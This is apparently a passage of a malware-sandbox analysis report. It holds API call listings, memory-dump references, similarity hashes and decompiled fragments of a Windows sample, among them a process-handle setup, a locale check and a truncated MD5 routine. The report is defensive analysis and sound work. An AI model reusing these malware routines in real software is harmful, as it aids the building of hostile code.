                                                            0x00000000
                                                            0x6e4b26b2
                                                            0x6e4b24f0
                                                            0x6e4b24f0
                                                            0x6e4b24f4
                                                            0x6e4b24f6
                                                            0x6e4b24f6
                                                            0x6e4b24f6
                                                            0x6e4b24f6
                                                            0x6e4b24f9
                                                            0x6e4b24fa
                                                            0x6e4b24fd
                                                            0x6e4b24fd
                                                            0x6e4b2501
                                                            0x6e4b2505
                                                            0x6e4b2513
                                                            0x6e4b2513
                                                            0x6e4b251b
                                                            0x6e4b2521
                                                            0x6e4b2523
                                                            0x6e4b2525
                                                            0x6e4b2535
                                                            0x6e4b2542
                                                            0x6e4b2546
                                                            0x6e4b254b
                                                            0x6e4b254d
                                                            0x6e4b25cb
                                                            0x6e4b25cb
                                                            0x6e4b254f
                                                            0x6e4b254f
                                                            0x6e4b254f
                                                            0x6e4b25cd
                                                            0x6e4b25cf
                                                            0x6e4b26b0
                                                            0x6e4b26b0
                                                            0x00000000
                                                            0x6e4b25d5
                                                            0x6e4b25d5
                                                            0x6e4b25dc
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25e2
                                                            0x6e4b25e6
                                                            0x6e4b2642
                                                            0x6e4b2644
                                                            0x6e4b264c
                                                            0x6e4b264e
                                                            0x6e4b2650
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2652
                                                            0x6e4b2658
                                                            0x6e4b265a
                                                            0x6e4b265c
                                                            0x6e4b2671
                                                            0x6e4b2671
                                                            0x6e4b2673
                                                            0x6e4b26a2
                                                            0x6e4b26a9
                                                            0x00000000
                                                            0x6e4b26a9
                                                            0x6e4b2677
                                                            0x6e4b2678
                                                            0x6e4b267a
                                                            0x6e4b267c
                                                            0x6e4b267c
                                                            0x6e4b267e
                                                            0x6e4b2680
                                                            0x6e4b2682
                                                            0x6e4b2696
                                                            0x6e4b2696
                                                            0x6e4b2699
                                                            0x6e4b269b
                                                            0x6e4b269b
                                                            0x6e4b269c
                                                            0x6e4b269c
                                                            0x00000000
                                                            0x6e4b2684
                                                            0x6e4b2684
                                                            0x6e4b2684
                                                            0x6e4b268d
                                                            0x6e4b268e
                                                            0x6e4b2690
                                                            0x6e4b2692
                                                            0x6e4b2692
                                                            0x00000000
                                                            0x6e4b2684
                                                            0x6e4b2682
                                                            0x6e4b265e
                                                            0x6e4b2665
                                                            0x6e4b2665
                                                            0x6e4b2667
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2669
                                                            0x6e4b266a
                                                            0x6e4b266d
                                                            0x6e4b266f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b266f
                                                            0x00000000
                                                            0x6e4b2665
                                                            0x6e4b25e8
                                                            0x6e4b25eb
                                                            0x6e4b25f0
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25f9
                                                            0x6e4b25fb
                                                            0x6e4b2601
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2607
                                                            0x6e4b260d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2613
                                                            0x6e4b2615
                                                            0x6e4b261e
                                                            0x6e4b2622
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2628
                                                            0x6e4b262b
                                                            0x6e4b262d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2634
                                                            0x6e4b2636
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2638
                                                            0x6e4b263c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b263c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2527
                                                            0x6e4b2527
                                                            0x6e4b2527
                                                            0x6e4b252e
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2530
                                                            0x6e4b2531
                                                            0x6e4b2533
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2533
                                                            0x6e4b255b
                                                            0x6e4b255d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b256d
                                                            0x6e4b256f
                                                            0x6e4b2571
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2577
                                                            0x6e4b257e
                                                            0x6e4b25aa
                                                            0x6e4b25aa
                                                            0x6e4b25ac
                                                            0x6e4b25ae
                                                            0x6e4b25c2
                                                            0x6e4b25c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25b0
                                                            0x6e4b25b0
                                                            0x6e4b25b0
                                                            0x6e4b25b9
                                                            0x6e4b25ba
                                                            0x6e4b25bc
                                                            0x6e4b25be
                                                            0x6e4b25be
                                                            0x00000000
                                                            0x6e4b25b0
                                                            0x6e4b2580
                                                            0x6e4b2583
                                                            0x6e4b2585
                                                            0x6e4b2597
                                                            0x6e4b2597
                                                            0x6e4b259a
                                                            0x6e4b259c
                                                            0x6e4b259c
                                                            0x6e4b259d
                                                            0x6e4b259d
                                                            0x6e4b25a3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2587
                                                            0x6e4b2587
                                                            0x6e4b2587
                                                            0x6e4b258e
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2590
                                                            0x6e4b2590
                                                            0x6e4b2591
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2591
                                                            0x6e4b2593
                                                            0x6e4b2595
                                                            0x6e4b25a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b25a8
                                                            0x00000000
                                                            0x6e4b2595
                                                            0x6e4b2507
                                                            0x6e4b250a
                                                            0x6e4b250d
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b250f
                                                            0x6e4b2511
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b2511
                                                            0x6e4b24d6
                                                            0x6e4b24d8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E4B2546
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: MemoryQueryVirtual
                                                            • String ID: @BKn$@BKn$@BKn
                                                            • API String ID: 2850889275-3961683012
                                                            • Opcode ID: 6aaa00e909a7844f3e367c84b01578d8cd9cb46b93bfe8d09ae9741b820a44e8
                                                            • Instruction ID: ee39b1b2bc79f61e04113d477c7142f7d2efa3713c100694ea44da4721bc028a
                                                            • Opcode Fuzzy Hash: 6aaa00e909a7844f3e367c84b01578d8cd9cb46b93bfe8d09ae9741b820a44e8
                                                            • Instruction Fuzzy Hash: 6F61D6306146029FDB59CEB9D4A0F5A33B9AB86394B20843BD455CB794FF70D883C678
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04573716
                                                            • lstrlenW.KERNEL32(?), ref: 04573724
                                                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0457374F
                                                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 0457377C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Query$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3961825720-0
                                                            • Opcode ID: d52a1f4ba749a67f87daa6ea3f3852fca5bf5dc1f445fa45ca89712f54471fa2
                                                            • Instruction ID: acedbe013a5178b3f5a95c69d87d6d2c2c54966be1d1991fb0487c031d202ea6
                                                            • Opcode Fuzzy Hash: d52a1f4ba749a67f87daa6ea3f3852fca5bf5dc1f445fa45ca89712f54471fa2
                                                            • Instruction Fuzzy Hash: D1413BB1500209EFEF119FA8E984AAEBBBCFF04714F044169F905A6250DB75EA15FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04564873
                                                              • Part of subcall function 04564173: RtlNtStatusToDosError.NTDLL(00000000), ref: 045641AB
                                                              • Part of subcall function 04564173: SetLastError.KERNEL32(00000000), ref: 045641B2
                                                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 04564983
                                                              • Part of subcall function 04579180: RtlNtStatusToDosError.NTDLL(00000000), ref: 04579198
                                                            • memcpy.NTDLL(00000218,04584EE0,00000100,?,00010003,?,?,00000318,00000008), ref: 04564902
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 0456495C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Status$Last$memcpymemset
                                                            • String ID:
                                                            • API String ID: 945571674-0
                                                            • Opcode ID: 68599632981130c1237c1006fc5b2019d6de47c980572c22cfef73d52e21f3cb
                                                            • Instruction ID: d4cb7e6207278c732e6b3596240938f72153778a5413623509baf8bdeb391ce8
                                                            • Opcode Fuzzy Hash: 68599632981130c1237c1006fc5b2019d6de47c980572c22cfef73d52e21f3cb
                                                            • Instruction Fuzzy Hash: 8D316471941209AFEB20DF64E988AAAB7F8FB05344F10456EE546E7250EB30BE44EB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0458C1A8,0458C144), ref: 0457D8E0
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0457D92B
                                                              • Part of subcall function 0456E0F2: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,04580483), ref: 0456E109
                                                              • Part of subcall function 0456E0F2: QueueUserAPC.KERNELBASE(?,00000000,04575ADA,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E11E
                                                              • Part of subcall function 0456E0F2: GetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E129
                                                              • Part of subcall function 0456E0F2: TerminateThread.KERNEL32(00000000,00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E133
                                                              • Part of subcall function 0456E0F2: CloseHandle.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E13A
                                                              • Part of subcall function 0456E0F2: SetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E143
                                                            • GetLastError.KERNEL32(0457AD22,00000000,00000000), ref: 0457D913
                                                            • CloseHandle.KERNEL32(00000000), ref: 0457D923
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 1700061692-0
                                                            • Opcode ID: aecc76eff09d4ee473b5ed29af4dabe45f9c084d2584009a1db3a500ceb001ac
                                                            • Instruction ID: 0b5ed44fd3f4970180f0a50c0eb4be03edf94fb5cb322c8b5d230cb12dc00b82
                                                            • Opcode Fuzzy Hash: aecc76eff09d4ee473b5ed29af4dabe45f9c084d2584009a1db3a500ceb001ac
                                                            • Instruction Fuzzy Hash: 21F0A471345211AFF3115B68BC88F7B77A8FB45375B100139FA56E32C1DA641C09EA75
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			// Decompiler output as reported by the sandbox; comments added for orientation.
                                                            			// Initialisation routine: creates a manual-reset event, records the OS version
                                                            			// and own PID in globals, then opens a handle to the current process.
                                                            			E6E4B1C6F() {
                                                            				void* _t1;
                                                            				long _t3;
                                                            				void* _t4;
                                                            				long _t5;
                                                            				void* _t6;
                                                            				intOrPtr _t8;
                                                            
                                                            				_t8 =  *0x6e4b41b0;
                                                            				_t1 = CreateEventA(0, 1, 0, 0); // bManualReset = 1, unnamed, initially non-signalled
                                                            				 *0x6e4b41bc = _t1;
                                                            				if(_t1 == 0) {
                                                            					return GetLastError();
                                                            				}
                                                            				_t3 = GetVersion();
                                                            				if(_t3 <= 5) {
                                                            					_t4 = 0x32; // 0x32 = ERROR_NOT_SUPPORTED (50): refuse to run on the versions this compare rejects
                                                            					return _t4;
                                                            				} else {
                                                            					 *0x6e4b41ac = _t3; // cached GetVersion() result
                                                            					_t5 = GetCurrentProcessId();
                                                            					 *0x6e4b41a8 = _t5; // cached own PID
                                                            					 *0x6e4b41b0 = _t8;
                                                            					// 0x10047a = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE |
                                                            					//            PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD
                                                            					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                            					 *0x6e4b41a4 = _t6;
                                                            					if(_t6 == 0) {
                                                            						 *0x6e4b41a4 =  *0x6e4b41a4 | 0xffffffff; // store INVALID_HANDLE_VALUE (-1) on failure
                                                            					}
                                                            					return 0;
                                                            				}
                                                            			}

                                                            0x6e4b1c70
                                                            0x6e4b1c7e
                                                            0x6e4b1c86
                                                            0x6e4b1c8b
                                                            0x6e4b1cd5
                                                            0x6e4b1cd5
                                                            0x6e4b1c8d
                                                            0x6e4b1c95
                                                            0x6e4b1cd1
                                                            0x6e4b1cd3
                                                            0x6e4b1c97
                                                            0x6e4b1c97
                                                            0x6e4b1c9c
                                                            0x6e4b1caa
                                                            0x6e4b1caf
                                                            0x6e4b1cb5
                                                            0x6e4b1cbd
                                                            0x6e4b1cc2
                                                            0x6e4b1cc4
                                                            0x6e4b1cc4
                                                            0x6e4b1cce
                                                            0x6e4b1cce

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E4B1A30,73B763F0,00000000), ref: 6E4B1C7E
                                                            • GetVersion.KERNEL32 ref: 6E4B1C8D
                                                            • GetCurrentProcessId.KERNEL32 ref: 6E4B1C9C
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E4B1CB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                            • String ID:
                                                            • API String ID: 845504543-0
                                                            • Opcode ID: 696ec6ab127f7650a5ace5951860859f856824294ceeb3e49f1ca57f83638d83
                                                            • Instruction ID: 46c449c6f1dd6e21748194872e7679dcbb8637f6085ab225bf229ab3919253e0
                                                            • Opcode Fuzzy Hash: 696ec6ab127f7650a5ace5951860859f856824294ceeb3e49f1ca57f83638d83
                                                            • Instruction Fuzzy Hash: 29F01D71E44A20AFEF50BFB9B80DB453BA4AF16791F14411AE215DA2C4E3B064429B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0457742D
                                                            • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0457746D
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04577476
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$InformationLastQueryStatusThread
                                                            • String ID:
                                                            • API String ID: 2450163249-0
                                                            • Opcode ID: 4c4db0468344aca0f47e97ecfd3769e835afaf76b44311139ec9e092f6f07856
                                                            • Instruction ID: 3340cf69e20f15197fce15b7f2fe6a36b2d2af67a15be8bf67782c9cec2177a2
                                                            • Opcode Fuzzy Hash: 4c4db0468344aca0f47e97ecfd3769e835afaf76b44311139ec9e092f6f07856
                                                            • Instruction Fuzzy Hash: D601E875A40108FEEB10AAA5FD04DAEBBBEFB88700F100065F941E6150EB75E914AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			// Decompiler output as reported by the sandbox; comments added for orientation.
                                                            			// Returns the ISO 3166 country code of the user locale (e.g. "US"); falls back
                                                            			// to the system default UI language name if the locale query fails.
                                                            			E6E4B105E(void* __ecx) {
                                                            				char _v8;
                                                            				signed short _t7;
                                                            
                                                            				_v8 = _v8 & 0x00000000;
                                                            				// 0x400 = LOCALE_USER_DEFAULT, 0x5a = LOCALE_SISO3166CTRYNAME, 4-byte output buffer
                                                            				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
                                                            				if(_t7 == 0) {
                                                            					// the decompiler does not track the LANGID returned in AX here; the
                                                            					// masked _t7 passed below is that return value, not the failed GetLocaleInfoA result
                                                            					__imp__GetSystemDefaultUILanguage();
                                                            					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                            				}
                                                            				return _v8;
                                                            			}

                                                            0x6e4b1062
                                                            0x6e4b1073
                                                            0x6e4b107b
                                                            0x6e4b107d
                                                            0x6e4b1090
                                                            0x6e4b1090
                                                            0x6e4b109a

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E4B178D,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B1073
                                                            • GetSystemDefaultUILanguage.KERNEL32(?,?,6E4B178D,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B107D
                                                            • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E4B178D,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B1090
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Language$DefaultInfoLocaleNameSystem
                                                            • String ID:
                                                            • API String ID: 3724080410-0
                                                            • Opcode ID: 651af5d1c458f650d692f68fcb1f21c26ba497e3b777a023cf79dea3a2bd1655
                                                            • Instruction ID: 3d45e7c2b7087de19b108063331e4b740e3389283ed77564da63f8a6fa29bd2a
                                                            • Opcode Fuzzy Hash: 651af5d1c458f650d692f68fcb1f21c26ba497e3b777a023cf79dea3a2bd1655
                                                            • Instruction Fuzzy Hash: C7E04F64A40248B7EB00E7F29D0AFBD72BCAF01B4AF500049FB01E61C0D6B49A04A775
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 04576FA1
                                                            • RtlNtStatusToDosError.NTDLL(C000009A), ref: 04576FD8
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                            • String ID:
                                                            • API String ID: 2533303245-0
                                                            • Opcode ID: 1085ab3882b63f9ea333fa349906fe2b30f79b51c209fed1de0424edeb81cb8d
                                                            • Instruction ID: 56ccd365732ccadf3544ed74b6c0f96064a533d633e2096089a45fc5105ef988
                                                            • Opcode Fuzzy Hash: 1085ab3882b63f9ea333fa349906fe2b30f79b51c209fed1de0424edeb81cb8d
                                                            • Instruction Fuzzy Hash: FA01DB36502935ABD7215A54A914AAFB668BF81B71F050138ED05B7104DB35BD00B6D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 0456D02B
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 0456D043
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: InformationProcessQuerymemset
                                                            • String ID:
                                                            • API String ID: 2040988606-0
                                                            • Opcode ID: 80cf0e6b0989c5640e21b01eaf2ba576d8011bec45176911a01753c54b42ec26
                                                            • Instruction ID: c314e1144d74030b6ce0953f0448e3cd61b0e209e2b085f81ccff7b0a5645b99
                                                            • Opcode Fuzzy Hash: 80cf0e6b0989c5640e21b01eaf2ba576d8011bec45176911a01753c54b42ec26
                                                            • Instruction Fuzzy Hash: 81F068B590021DBAEB60DA90DC09FDE7B7CFB04750F004060BA08E6081E770EB49DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 045641AB
                                                            • SetLastError.KERNEL32(00000000), ref: 045641B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastStatus
                                                            • String ID:
                                                            • API String ID: 4076355890-0
                                                            • Opcode ID: eb94e36920c1ae32774d8e042f52edb824ccbf328476b08b0220ae3600f47660
                                                            • Instruction ID: 76d787b5dfe00b1bab718c0f8845bfb6aabf52bcaf73338107257421ead6b721
                                                            • Opcode Fuzzy Hash: eb94e36920c1ae32774d8e042f52edb824ccbf328476b08b0220ae3600f47660
                                                            • Instruction Fuzzy Hash: 17F0FE71910309FBEB05DBD4D909BDE77BCFB55305F10404CB601A6081EBB8AB08EB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0457A458
                                                            • SetLastError.KERNEL32(00000000,?,0456493D,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 0457A45F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastStatus
                                                            • String ID:
                                                            • API String ID: 4076355890-0
                                                            • Opcode ID: 7fbf975c446f97ef73fea287018e10f5c90fed85625bb215784f1945685435e6
                                                            • Instruction ID: 279245345faf65aeb357d41cd3e8503a548e0575da0a3655fe8af9775c334bcc
                                                            • Opcode Fuzzy Hash: 7fbf975c446f97ef73fea287018e10f5c90fed85625bb215784f1945685435e6
                                                            • Instruction Fuzzy Hash: 7EE0123224021AABCF015ED5AC08D9F7B59FB48741B044424BA01D6521DB3ADD20BBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0457DBFB
                                                            • SetLastError.KERNEL32(00000000,?,04579542,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 0457DC02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastStatus
                                                            • String ID:
                                                            • API String ID: 4076355890-0
                                                            • Opcode ID: 13a359080878bce087c3050989af4bcec66fabc73b2c07c3f05c01487361c12b
                                                            • Instruction ID: 0163515fe8495b3a2c835f1bd01d3fe3ce268039d587244b4680da3603d85969
                                                            • Opcode Fuzzy Hash: 13a359080878bce087c3050989af4bcec66fabc73b2c07c3f05c01487361c12b
                                                            • Instruction Fuzzy Hash: ADE0BF7260021AABCF025EE4ED08D9E7F6DFF48751B005424FE06E6121DB39E965BFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04578C93
                                                            • memset.NTDLL ref: 04578CA2
                                                              • Part of subcall function 0457E69A: memset.NTDLL ref: 0457E6AB
                                                              • Part of subcall function 0457E69A: memset.NTDLL ref: 0457E6B7
                                                              • Part of subcall function 0457E69A: memset.NTDLL ref: 0457E6E2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 28c74602a4c6d3f8fefc06176283aa78a9c3ed14a8b51ac47bef43b2591b45ce
                                                            • Instruction ID: eb530b3c545b89c166b4a1063e94a4cb52e579a7f5a5bdea95a29681f0735a87
                                                            • Opcode Fuzzy Hash: 28c74602a4c6d3f8fefc06176283aa78a9c3ed14a8b51ac47bef43b2591b45ce
                                                            • Instruction Fuzzy Hash: 3C021070501B218FC775DE29E688566BBF1BF547207604E2ED6EB8AA90E231F885DB04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 523c6934fa8619eb58fe062c8478ee53148621b1613d96d5b6d6cc4fc8df6de0
                                                            • Instruction ID: 44f596211e6f4ea021b3adb05468a415d93858d1b6ee3fdb104eec78ef85eb13
                                                            • Opcode Fuzzy Hash: 523c6934fa8619eb58fe062c8478ee53148621b1613d96d5b6d6cc4fc8df6de0
                                                            • Instruction Fuzzy Hash: BB22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			// Decompiler output as reported by the sandbox (truncated by the report); comment added for orientation.
                                                            			// The additive constants (e.g. -0x28955b88 = 0xd76aa478, -0x173848aa = 0xe8c7b756,
                                                            			// 0x242070db, -0x3e423112 = 0xc1bdceee) and the 7/12/17/22-bit rotations
                                                            			// (rol 7, rol 12, ror 15, ror 10) are the MD5 round-1 T-table and shift schedule:
                                                            			// this is an MD5 block transform over the 16 words unpacked from __ecx, with the
                                                            			// four-word state held at _a4[0..3].
                                                            			E00DD4FA7(void* __ecx, intOrPtr* _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v72;
                                                            				void _v76;
                                                            				intOrPtr* _t226;
                                                            				signed int _t229;
                                                            				signed int _t231;
                                                            				signed int _t233;
                                                            				signed int _t235;
                                                            				signed int _t237;
                                                            				signed int _t239;
                                                            				signed int _t241;
                                                            				signed int _t243;
                                                            				signed int _t245;
                                                            				signed int _t247;
                                                            				signed int _t249;
                                                            				signed int _t251;
                                                            				signed int _t253;
                                                            				signed int _t255;
                                                            				signed int _t257;
                                                            				signed int _t259;
                                                            				signed int _t274;
                                                            				signed int _t337;
                                                            				void* _t347;
                                                            				signed int _t348;
                                                            				signed int _t350;
                                                            				signed int _t352;
                                                            				signed int _t354;
                                                            				signed int _t356;
                                                            				signed int _t358;
                                                            				signed int _t360;
                                                            				signed int _t362;
                                                            				signed int _t364;
                                                            				signed int _t366;
                                                            				signed int _t375;
                                                            				signed int _t377;
                                                            				signed int _t379;
                                                            				signed int _t381;
                                                            				signed int _t383;
                                                            				intOrPtr* _t399;
                                                            				signed int _t407;
                                                            				signed int _t409;
                                                            				signed int _t411;
                                                            				signed int _t413;
                                                            				signed int _t415;
                                                            				signed int _t417;
                                                            				signed int _t419;
                                                            				signed int _t421;
                                                            				signed int _t423;
                                                            				signed int _t425;
                                                            				signed int _t427;
                                                            				signed int _t429;
                                                            				signed int _t437;
                                                            				signed int _t439;
                                                            				signed int _t441;
                                                            				signed int _t443;
                                                            				signed int _t445;
                                                            				void* _t447;
                                                            				signed int _t507;
                                                            				signed int _t598;
                                                            				signed int _t606;
                                                            				signed int _t612;
                                                            				signed int _t678;
                                                            				signed int* _t681;
                                                            				signed int _t682;
                                                            				signed int _t684;
                                                            				signed int _t689;
                                                            				signed int _t691;
                                                            				signed int _t696;
                                                            				signed int _t698;
                                                            				signed int _t717;
                                                            				signed int _t719;
                                                            				signed int _t721;
                                                            				signed int _t723;
                                                            				signed int _t725;
                                                            				signed int _t727;
                                                            				signed int _t733;
                                                            				signed int _t739;
                                                            				signed int _t741;
                                                            				signed int _t743;
